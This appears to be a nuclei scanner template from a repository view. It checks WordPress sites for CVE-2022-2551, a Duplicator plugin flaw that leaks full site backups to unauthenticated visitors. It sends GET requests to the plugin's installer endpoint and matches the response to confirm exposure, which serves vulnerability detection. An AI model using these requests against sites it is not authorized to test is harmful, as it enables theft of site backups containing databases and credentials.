nuclei-templates/cves/2022/CVE-2022-2551.yaml

36 lines
1.2 KiB
YAML
Raw Normal View History

2022-09-03 19:19:55 +00:00
id: CVE-2022-2551
info:
name: WordPress Plugin Vulnerabilities Duplicator < 1.4.7 - Unauthenticated Backup
auther: LRTK-CODER
severity: high
description: |
The Duplicator WordPress plugin before 1.4.7 discloses the url of the a backup to unauthenticated visitors accessing the main installer endpoint of the plugin, if the installer script has been run once by an administrator, allowing download of the full site backup without authenticating.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-2551
- https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551
- https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0
classification:
cve-id: CVE-2022-2551
cwe-id: CWE-284
tags: cve, cve2022, wordpress, wp, wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/backups-dup-lite/dup-installer/main.installer.php?is_daws=1"
- "{{BaseURL}}/dup-installer/main.installer.php?is_daws=1"
matchers-condition: and
matchers:
- type: status
status:
- 200
- condition: and
type: word
part: body
words:
- "<a href='../installer.php'>restart this install process</a>"